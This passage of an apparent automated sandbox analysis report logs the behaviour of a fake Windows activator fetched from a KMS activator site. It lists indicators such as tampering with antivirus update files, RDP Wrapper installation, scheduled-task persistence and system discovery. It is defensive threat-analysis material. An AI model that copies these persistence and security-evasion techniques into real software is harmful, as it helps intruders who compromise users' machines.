modification C:\Program Files\CPUID\HWMonitor update.exe File opened for modification C:\Program Files\ReasonLabs update.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini smss.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWinst.exe File opened for modification C:\Program Files\COMODO update.exe File opened for modification C:\Program Files (x86)\AVG update.exe File opened for modification C:\Program Files\DrWeb update.exe File opened for modification C:\Program Files (x86)\SpeedFan update.exe File opened for modification C:\Program Files (x86)\GPU Temp update.exe File opened for modification C:\Program Files (x86)\360 update.exe File opened for modification C:\Program Files\Common Files\AV update.exe File opened for modification C:\Program Files (x86)\Panda Security update.exe File opened for modification C:\Program Files (x86)\IObit update.exe File opened for modification C:\Program Files\Transmission update.exe File opened for modification C:\Program Files\RDP Wrapper smss.exe File opened for modification C:\Program Files\Malwarebytes update.exe File opened for modification C:\Program Files\HitmanPro update.exe File opened for modification C:\Program Files\Kaspersky Lab update.exe File opened for modification C:\Program Files\Bitdefender Agent update.exe File opened for modification C:\Program Files (x86)\Wise update.exe File opened for modification C:\Program Files\ByteFence update.exe File opened for modification C:\Program Files (x86)\Cezurity update.exe File opened for modification C:\Program Files\Rainmeter update.exe File opened for modification C:\Program Files\ESET update.exe File opened for modification C:\Program Files\SUPERAntiSpyware update.exe File opened for modification C:\Program Files (x86)\MSI\MSI Center update.exe File opened for modification C:\Program Files\NETGATE update.exe File opened for modification C:\Program Files\Enigma Software Group update.exe File opened for modification C:\Program Files\SpyHunter update.exe File opened for modification C:\Program Files\AVG update.exe File opened for modification C:\Program Files\Ravantivirus update.exe File opened for modification C:\Program Files (x86)\IObit\IObit Malware Fighter update.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Notification\notification_fast.bundle.js msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-fr.hyb msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-te.hyb msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification\ru\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-tokenized-card\nl\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Notification\notification.bundle.js msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-as.hyb msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\auto_open_controller.js msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\fi\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-mobile-hub\nl\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-shared-components\id\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Mini-Wallet\miniwallet.bundle.js msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\wallet-icon.svg msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\wallet-webui-992.268aa821c3090dce03cb.chunk.js msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_653919595\Part-NL msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-ec\fi\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\el\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-mobile-hub\zh-Hans\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\edge_driver.js msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\edge_driver.js msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-ec\cs\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-tokenized-card\fr-CA\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Notification\notification_fast.bundle.js.LICENSE.txt msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Tokenized-Card\tokenized-card.bundle.js msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\wallet-webui-708.de49febeeb0e9c77883f.chunk.js msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\ar\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\ru\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-shared-components\cs\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_700750315\deny_domains.list msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification\de\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\es\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-mn-cyrl.hyb msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_653919595\Part-DE msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\manifest.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\it\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-mobile-hub\ar\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\fr-CA\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-shared-components\fr\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\wallet\wallet-checkout\merchant-site-info.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-de-1996.hyb msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\ru\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\runtime.bundle.js msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_1498492656\manifest.fingerprint msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-bg.hyb msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\product_page.js msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\hu\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-shared-components\pt-BR\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-tokenized-card\ru\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_653919595\Part-FR msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_2024013401\sets.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_1972247359\manifest.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\wallet\wallet-notification-config.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Notification\notification.html msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\edge_checkout_page_validator.js msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\bnpl\bnpl.html msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification\sv\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\el\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping468_693472959\_metadata\verified_contents.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_700750315\deny_etld1_domains.list msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-sl.hyb msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\crypto.bundle.js msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-mobile-hub\ru\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\de\strings.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\zh-Hans\strings.json msedge.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2200 sc.exe 4884 sc.exe 3708 sc.exe 6032 sc.exe 5656 sc.exe 2516 sc.exe 5696 sc.exe 5876 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language W10DigitalActivation.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWinst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7zaxxx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7zaxxx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language win.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString smss.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 smss.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 2124 timeout.exe 1808 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133895695533523394" msedge.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe -
Modifies registry class 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage smss.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3457531954-2054407110-1019940402-1000\{6D6688C3-7945-484D-B534-F54B959BC780} msedge.exe Key created \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3457531954-2054407110-1019940402-1000\{B2EED048-F807-45D8-9CDA-850EE2E93D88} msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database smss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset smss.exe -
NTFS ADS 3 IoCs
description ioc Process File opened for modification C:\ProgramData\Setup\winmgmts:\ IP.exe File opened for modification C:\ProgramData\Setup\WinMgmts:\ IP.exe File opened for modification C:\ProgramData\Setup\winmgmts:\ smss.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4100 schtasks.exe 2244 schtasks.exe 5380 schtasks.exe 3784 schtasks.exe 4568 schtasks.exe 4796 schtasks.exe 1356 schtasks.exe 2568 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5468 msedge.exe 5468 msedge.exe 2560 KMSTools Lite.exe 2560 KMSTools Lite.exe 2560 KMSTools Lite.exe 2560 KMSTools Lite.exe 2560 KMSTools Lite.exe 2560 KMSTools Lite.exe 2560 KMSTools Lite.exe 2560 KMSTools Lite.exe 2936 KMSTools Lite.exe 2936 KMSTools Lite.exe 2936 KMSTools Lite.exe 2936 KMSTools Lite.exe 2936 KMSTools Lite.exe 2936 KMSTools Lite.exe 2936 KMSTools Lite.exe 2936 KMSTools Lite.exe 344 KMSTools Lite.exe 344 KMSTools Lite.exe 344 KMSTools Lite.exe 344 KMSTools Lite.exe 344 KMSTools Lite.exe 344 KMSTools Lite.exe 344 KMSTools Lite.exe 344 KMSTools Lite.exe 2120 7zFM.exe 2120 7zFM.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 4264 KMSTools Lite.exe 5544 update.exe 5544 update.exe 5544 update.exe 5544 update.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 2120 7zFM.exe 4712 GSetup.exe 4232 unsecapp.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 676 Process not Found 676 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 468 msedge.exe 468 msedge.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeRestorePrivilege 2120 7zFM.exe Token: 35 2120 7zFM.exe Token: SeSecurityPrivilege 2120 7zFM.exe Token: SeSecurityPrivilege 2120 7zFM.exe Token: 33 1316 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1316 AUDIODG.EXE Token: SeRestorePrivilege 5576 7zaxxx.exe Token: 35 5576 7zaxxx.exe Token: SeSecurityPrivilege 5576 7zaxxx.exe Token: SeSecurityPrivilege 5576 7zaxxx.exe Token: SeRestorePrivilege 1544 7zaxxx.exe Token: 35 1544 7zaxxx.exe Token: SeSecurityPrivilege 1544 7zaxxx.exe Token: SeSecurityPrivilege 1544 7zaxxx.exe Token: SeDebugPrivilege 4020 powershell.exe Token: SeDebugPrivilege 6072 winserv.exe Token: SeTakeOwnershipPrivilege 5128 winserv.exe Token: SeTcbPrivilege 5128 winserv.exe Token: SeTcbPrivilege 5128 winserv.exe Token: SeDebugPrivilege 3240 RDPWinst.exe Token: SeAuditPrivilege 2116 svchost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe 1188 msedge.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 4712 GSetup.exe 4712 GSetup.exe 4712 GSetup.exe -
Suspicious use of SetWindowsHookEx 34 IoCs
pid Process 2560 KMSTools Lite.exe 2936 KMSTools Lite.exe 344 KMSTools Lite.exe 4264 KMSTools Lite.exe 4712 GSetup.exe 5232 install.exe 5576 7zaxxx.exe 1300 W10DigitalActivation.exe 1748 KMS.exe 5544 update.exe 1544 7zaxxx.exe 2748 Office Installer+_x64.exe 476 win.exe 5740 svchost.exe 5132 IP.exe 1968 smss.exe 6072 winserv.exe 6072 winserv.exe 6072 winserv.exe 6072 winserv.exe 6072 winserv.exe 5128 winserv.exe 5128 winserv.exe 5128 winserv.exe 5128 winserv.exe 3240 RDPWinst.exe 3728 winserv.exe 3728 winserv.exe 3728 winserv.exe 3728 winserv.exe 3620 winserv.exe 3620 winserv.exe 3620 winserv.exe 3620 winserv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1188 wrote to memory of 5596 1188 msedge.exe 81 PID 1188 wrote to memory of 5596 1188 msedge.exe 81 PID 1188 wrote to memory of 5152 1188 msedge.exe 82 PID 1188 wrote to memory of 5152 1188 msedge.exe 82 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 1676 1188 msedge.exe 83 PID 1188 wrote to memory of 4272 1188 msedge.exe 84 PID 1188 wrote to memory of 4272 1188 msedge.exe 84 PID 1188 wrote to memory of 4272 1188 msedge.exe 84 PID 1188 wrote to memory of 4272 1188 msedge.exe 84 PID 1188 wrote to memory of 4272 1188 msedge.exe 84 PID 1188 wrote to memory of 4272 1188 msedge.exe 84 PID 1188 wrote to memory of 4272 1188 msedge.exe 84 PID 1188 wrote to memory of 4272 1188 msedge.exe 84 PID 1188 wrote to memory of 4272 1188 msedge.exe 84 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://kms-auto.site/windows-10-activator/1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2ec,0x300,0x7ff847c7f208,0x7ff847c7f214,0x7ff847c7f2202⤵PID:5596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1928,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2308 /prefetch:32⤵PID:5152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2272,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:22⤵PID:1676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2408,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2584 /prefetch:82⤵PID:4272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3476,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:12⤵PID:5576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3472,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3544 /prefetch:12⤵PID:4544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5092,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5108 /prefetch:12⤵PID:2792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5072,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5292 /prefetch:82⤵PID:5568
-
-
